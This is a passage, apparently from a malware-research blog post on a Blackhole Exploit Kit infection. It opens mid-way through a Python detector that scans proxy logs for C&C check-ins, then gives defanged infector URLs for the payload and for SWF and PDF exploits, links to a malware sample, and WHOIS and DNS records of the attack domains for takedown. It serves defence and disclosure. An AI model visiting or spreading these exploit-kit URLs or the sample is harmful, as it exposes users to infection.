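    m = LOG_RE.match(line)
    if not m:
        return None
    host, port = parse_url(m.group("url"))
    if host is None:
        return None
    cnc_hosts = {h for h, _ in CNC_ENDPOINTS}
    if (host, port) in CNC_ENDPOINTS and m.group("method") == "POST":
        return ("cnc-post", m.group("client"), host, port)
    if host in cnc_hosts or host in SUSPECT_HOSTS:
        # Right host, wrong port or method: still worth a ticket, lower confidence.
        return ("cnc-contact", m.group("client"), host, port)
    return None


def scan_log(log_text):
    """Run classify() over every line and return the list of hits in log order."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for kind, client, host, port in scan_log(SAMPLE_ACCESS_LOG):
        print(f"{kind:12s} {client} -> {host}:{port}")
```

Note the default-port handling: the report lists 203.113.98.131:80, and a proxy log will write that URL without an explicit port, so comparing the raw URL string against "203.113.98.131:80" would miss the check-in.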

Are we suppose to laugh??

These moronz are making a sick joke by putting many strings of "HO HO HO.." Let's just shut down all of the services/IPs/domains related to this infection - and let's see who will laugh "HO HO HO" in the end (facepalm)

To fellow "Good Guys" / Researchers

The malware sample can be downloaded here --->>[CLICK] PCAP & RegShot can be downloaded here --->>[CLICK] A ThreatExpert reference exists (not so detailed though..)--->>[CLICK] Below is the infector and the long BHEK2 cracked url list:
-------------------------------------------------------
INFECTOR      BHEK2 LOONG URL :-)
-------------------------------------------------------
payload:       h00p://pelamutrika[.]ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i
field.swf:     h00p://pelamutrika[.]ru:8080/forum/links/column.php?vmsxmw=30:1n:1i:1i:33&dpr=2w:3g:3d:36:3c&knusk=2v:1k:1m:32:33:1k:1k:31:1j:1o&vtsf=clq
score.swf:     h00p://pelamutrika[.]ru:8080/forum/links/column.php?vmsxmw=30:1n:1i:1i:33&dpr=2w:3g:3d:36:3c&knusk=2v:1k:1m:32:33:1k:1k:31:1j:1o&vtsf=clq
infector1.pdf: h00p://pelamutrika[.]ru:8080/forum/links/column.php?qxwfe=30:1n:1i:1i:33&anaxw=38:3e:3h&kfcb=2v:1k:1m:32:33:1k:1k:31:1j:1o&zzsp=1k:1d:1f:1d:1g:1d:1f
infector2.pdf: h00p://pelamutrika[.]ru:8080/forum/links/column.php?zxztpaa=30:1n:1i:1i:33&evx=3e&sev=2v:1k:1m:32:33:1k:1k:31:1j:1o&uaauvo=1k:1d:1f:1d:1g:1d:1f

For the Shutdown Purpose

domain:        PELAMUTRIKA.RU
nserver:       ns1.pelamutrika.ru. 62.76.189.72
nserver:       ns2.pelamutrika.ru. 41.168.5.140
nserver:       ns3.pelamutrika.ru. 132.248.49.112
nserver:       ns4.pelamutrika.ru. 209.51.221.247
nserver:       ns5.pelamutrika.ru. 208.87.243.196
nserver:       ns6.pelamutrika.ru. 216.99.149.226
pelamutrika.ru  A  42.121.116.38
pelamutrika.ru  A  202.180.221.186
pelamutrika.ru  A  208.87.243.131
pelamutrika.ru  A  212.162.52.180
pelamutrika.ru  A  212.162.56.210

state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     NAUNET-REG-RIPN
admin-contact: https://client.naunet.ru/c/whoiscontact
created:       2012.11.25
paid-till:     2013.11.25
free-date:     2013.12.26
source:        TCI
Last updated on 2012.12.09 19:06:53 MSK

3 comments:

  1. Pssst! Did you hear some bad-*ss moronz just cursing? :P

  2. These BadActor Moronz are moving their BHEK server into SECURENETZ-DE VPS with domains & IP below:

    ganiopatia.ru A 212.162.52.180
    pelamutrika.ru A 212.162.52.180
    aliamognoa.ru A 212.162.52.180
    ahiontota.ru A 212.162.52.180
    anifkailood.ru A 212.162.52.180
    genevaonline.ru A 212.162.52.180
    podarunoki.ru A 212.162.52.180
    aseniakrol.ru A 212.162.52.180
    pitoniamason.ru A 212.162.52.180
    dimarikanko.ru A 212.162.52.180

    ganiopatia.ru A 212.162.56.210
    pelamutrika.ru A 212.162.56.210
    aliamognoa.ru A 212.162.56.210
    ahiontota.ru A 212.162.56.210
    anifkailood.ru A 212.162.56.210
    genevaonline.ru A 212.162.56.210
    podarunoki.ru A 212.162.56.210
    aseniakrol.ru A 212.162.56.210
    pitoniamason.ru A 212.162.56.210
    dimarikanko.ru A 212.162.56.210

  3. They actually are moving IP, here's the other IP same VPS:

    ahiontota.ru A 212.162.13.230 <NEW DOMAINS in NEW VPS IP ADDRESS
    anifkailood.ru A 212.162.13.230
    podarunoki.ru A 212.162.13.230
    aseniakrol.ru A 212.162.13.230
    pitoniamason.ru A 212.162.13.230
    amnaosogo.ru A 212.162.13.230
    dimarikanko.ru A 212.162.13.230
    aofngppahgor.ru A 212.162.13.230
